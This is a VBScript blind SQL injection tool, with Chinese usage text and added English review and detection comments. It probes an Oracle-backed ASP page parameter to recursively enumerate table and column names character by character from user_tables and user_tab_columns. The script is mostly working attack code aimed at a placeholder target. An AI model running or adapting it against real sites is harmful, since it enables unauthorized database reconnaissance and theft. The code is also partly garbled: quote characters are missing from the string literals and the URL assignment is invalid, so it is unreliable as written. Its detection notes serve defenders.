感谢marcos,人才呀,巧妙的递归;2010我懒了,以后再加猜字段值内容吧
' Shared HTTP client used by GetPage. Microsoft.XMLHTTP sends each request
' with the library's default headers and no session cookies, so from the
' server side this traffic does not look like a browser session.
Set oracleXML = CreateObject("Microsoft.XMLHTTP")
' Base URL; the last query parameter is where the probe clauses are appended.
' As printed here the right-hand side is not a valid VBScript string literal
' (quote characters appear to have been dropped in this copy). The trailing
' text reads "edit this yourself".
TargetURL = http://www.target.com/information/view.asp?bna=abc 自行修改
' Text expected only in the "condition true" response; callers test
' InStr(page, RightWord) > 0. The curly apostrophe before 自行修改 stands in
' for the VBScript comment marker.
RightWord = "正常页面字符串" ’自行修改
' Refuse to run under the GUI host (wscript.exe) so that Echo output goes to
' the console instead of message boxes.
if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.echo "Execute it under the cmd.exe Plz! Thx."
wscript.quit
end If
' First command-line argument selects the mode; with no arguments `action`
' stays Empty and the Select Case below falls through to usage().
' No Option Explicit is visible in this copy, so variables are implicit.
Set oArgs = WScript.arguments
if oArgs.count<>0 then
action=trim(oArgs(0))
End if
' Dispatch. Note that the column mode ("ziduan") additionally reads the
' table name from oArgs(1) inside GetFileNameX; the usage text does not say so.
select case action
case "biao"
biaocrack
case "ziduan"
Ziduancrack
case else
usage
end Select
' Mode "biao": walk the table-name search tree from an empty prefix and
' print the accumulated result once the recursive enumeration returns.
Function Biaocrack()
Dim sNames
sNames = GetTableNameX("")
WScript.Echo sNames
End Function
' Mode "ziduan": walk the column-name search tree from an empty prefix and
' print the accumulated result once the recursive enumeration returns.
Function Ziduancrack()
Dim sColumns
sColumns = GetFileNameX("")
WScript.Echo sColumns
End Function
' Prints command-line help. Every entry already ends in vbNewLine, so the
' newline that WScript.Echo appends leaves a blank line after each one.
' NOTE(review): the third entry documents "this.vbs 表名", but the top-level
' dispatcher only enters the column mode for the first argument "ziduan"
' and takes the table name from the second argument.
Function usage()
Dim aLines(2), i
aLines(0) = "请改动源码里的url和正确页面显示的字符串,默认猜字符型。如果数字型去掉sql语句里的第一个单引号"& vbNewLine
aLines(1) = "cscript this.vbs biao-------------------------------->是猜当前库所有的表名"&vbNewLine
aLines(2) = "cscript this.vbs 表名---------------------------->是猜给定表名里所有的字段名"&vbNewLine
For i = 0 To 2
WScript.Echo aLines(i)
Next
End Function
' Enumerates table names visible to the injected session (user_tables) one
' character at a time by boolean-based blind SQL injection: each probe
' appends a " and 0<>(select count(*) ...) and a=a" clause to TargetURL and
' treats the presence of RightWord in the returned page as "true".
'
' sPrefix: the characters already confirmed (upper-cased here); the first
'          call passes "".
' Returns: newline-separated names, accumulated in the function's return
'          variable (GetTableNameX without parentheses reads that variable;
'          with parentheses it is the recursive call).
'
' NOTE(review): some characters of the string literals appear to have been
' lost in this copy, so the exact payload text cannot be read off here.
'
' Detection notes: every probe carries the fixed tokens "user_tables",
' "substr(table_name", "length(table_name)>" and the trailing "and a=a";
' each prefix costs up to 38 requests (one per entry of aChars) plus two
' follow-up requests per hit, all to the same parameterised URL from the
' default Microsoft.XMLHTTP client (see GetPage). Rules on those tokens, or
' on bursts of near-identical query strings, catch this kind of walk.
Function GetTableNameX(sPrefix)
iLen = Len(sPrefix)
sPrefix = UCase(sPrefix)
' Candidate alphabet: A-Z, 0-9, "_" and "-" (38 entries).
aChars = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "_","-")
For I = 0 To UBound(aChars)
' First character: test position 1 only; otherwise anchor on the known
' prefix and test the next position.
If(iLen = 0)Then
SQL = " and 0<>(select count(*) from user_tables where substr(table_name,1,1)"
Else
SQL = " and 0<>(select count(*) from user_tables where substr(table_name,1," & iLen & ")=" & sPrefix & " AND substr(table_name," & (iLen + 1) & ",1)"
End If
sSQL = SQL & "=" & aChars(I) & ") and a=a"
sHTML = GetPage(TargetURL & sSQL)
iPos = InStr(sHTML, RightWord)
If(iPos > 0)Then
' Hit: first check whether prefix + this character is a complete name.
sSQL=" and 0<>(select count(*) from user_tables where table_name=" & sPrefix & aChars(I) & ") and a=a"
sHTML = GetPage(TargetURL & sSQL)
iPos = InStr(sHTML, RightWord)
If(iPos > 0)Then
' "[-]" marks a complete name; it is appended to the result.
WScript.Echo "[-]: " & sPrefix & aChars(I)
GetTableNameX = GetTableNameX & sPrefix & aChars(I) & vbNewLine
End If
' Then check whether longer names share this prefix; if so, recurse.
sSQL=" and 0<>(select count(*) from user_tables where substr(table_name,1," & (iLen + 1) & ")=" & sPrefix & aChars(I) & " AND length(table_name)>" & (iLen + 1) & ") and a=a"
sHTML = GetPage(TargetURL & sSQL)
iPos = InStr(sHTML, RightWord)
If(iPos > 0)Then
' "[+]" marks a prefix that continues; the recursive result is appended.
WScript.Echo "[+]: " & sPrefix & aChars(I)
GetTableNameX = GetTableNameX & vbNewLine & GetTableNameX(sPrefix & aChars(I))
End If
Else
' Miss: the rejected candidate is still echoed as progress output.
WScript.Echo sPrefix & aChars(I)
End If
Next
' Separator printed once per prefix level, after its 38 candidates.
WScript.Echo "=========================================="
End Function
' Enumerates column names of one table (user_tab_columns filtered on
' table_name = UCase(oArgs(1))) one character at a time, using the same
' boolean-based blind probing as GetTableNameX. Despite its name this
' function deals with column names, not files.
'
' sPrefix: the characters already confirmed (upper-cased here); the first
'          call passes "".
' Returns: newline-separated column names, accumulated in the function's
'          return variable (GetFileNameX without parentheses reads it; with
'          parentheses it is the recursive call).
'
' NOTE(review): oArgs(1) is read without checking oArgs.Count, so running
' the "ziduan" mode with a single argument fails at runtime.
' NOTE(review): the WSH.ECHO lines print every full probe URL to the console
' (WSH is the host's alias for WScript); GetTableNameX does not do this.
' NOTE(review): some characters of the string literals appear to have been
' lost in this copy, so the exact payload text cannot be read off here.
'
' Detection notes: as for GetTableNameX, but the fixed tokens here are
' "user_tab_columns", "substr(column_name", "length(column_name)>" and the
' trailing "and a=a", again up to 38 requests per prefix plus two per hit.
Function GetFileNameX(sPrefix)
iLen = Len(sPrefix)
sPrefix = UCase(sPrefix)
' Candidate alphabet: A-Z, 0-9, "_" and "-" (38 entries).
aChars = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "_","-")
For I = 0 To UBound(aChars)
' First character: test position 1 only; otherwise anchor on the known
' prefix and test the next position.
If(iLen = 0)Then
SQL = " and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and substr(column_name,1,1)"
Else
SQL = " and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and substr(column_name,1," & iLen & ")=" & sPrefix & " AND substr(column_name," & (iLen + 1) & ",1)"
End If
sSQL = SQL & "=" & aChars(I) & ") and a=a"
WSH.ECHO TargetURL & sSQL
sHTML = GetPage(TargetURL & sSQL)
iPos = InStr(sHTML, RightWord)
If(iPos > 0)Then
' Hit: first check whether prefix + this character is a complete name.
sSQL=" and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and column_name=" & sPrefix & aChars(I) & ") and a=a"
WSH.ECHO TargetURL & sSQL
sHTML = GetPage(TargetURL & sSQL)
iPos = InStr(sHTML, RightWord)
If(iPos > 0)Then
' "[-]" marks a complete column name; it is appended to the result.
WScript.Echo "[-]: " & sPrefix & aChars(I)
GetFileNameX = GetFileNameX & sPrefix & aChars(I) & vbNewLine
End If
' Then check whether longer names share this prefix; if so, recurse.
sSQL=" and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and substr(column_name,1," & (iLen + 1) & ")=" & sPrefix & aChars(I) & " AND length(column_name)>" & (iLen + 1) & ") and a=a"
WSH.ECHO TargetURL & sSQL
sHTML = GetPage(TargetURL & sSQL)
iPos = InStr(sHTML, RightWord)
If(iPos > 0)Then
' "[+]" marks a prefix that continues; the recursive result is appended.
WScript.Echo "[+]: " & sPrefix & aChars(I)
GetFileNameX = GetFileNameX & vbNewLine & GetFileNameX(sPrefix & aChars(I))
End If
Else
' Miss: the rejected candidate is still echoed as progress output.
WScript.Echo sPrefix & aChars(I)
End If
Next
' Separator printed once per prefix level, after its 38 candidates.
WScript.Echo "=========================================="
End Function
===========================================================
' Synchronous GET of sURL over the shared oracleXML client; the raw response
' bytes are decoded by BytesToBStr. There is no status check, timeout or
' error handling, so an error page is returned and searched like any other.
' The empty user/password arguments mean no HTTP authentication is sent.
Function GetPage(sURL)
Dim vBody
With oracleXML
.Open "Get", sURL, False, "", ""
.Send()
vBody = .ResponseBody
End With
GetPage = BytesToBStr(vBody)
End Function
============================================
函数名称:BytesToBStr
函数功能:将XMLHTTP对象中的内容转化为GB2312编码
============================================
' Converts a raw response body (byte array) to a string by writing it into
' an ADODB.Stream in binary mode and reading it back as GB2312 text.
' Body: the bytes to decode (e.g. an XMLHTTP ResponseBody).
' Returns: the decoded text; the stream is closed and released before return.
Function BytesToBStr(Body)
Dim oStream
Set oStream = CreateObject("ADODB.Stream")
With oStream
.Type = 1          ' adTypeBinary: accept the raw bytes
.Mode = 3          ' adModeReadWrite
.Open
.Write Body
.Position = 0      ' rewind before switching to text mode
.Type = 2          ' adTypeText
.Charset = "GB2312"
BytesToBStr = .ReadText
.Close
End With
Set oStream = Nothing
End Function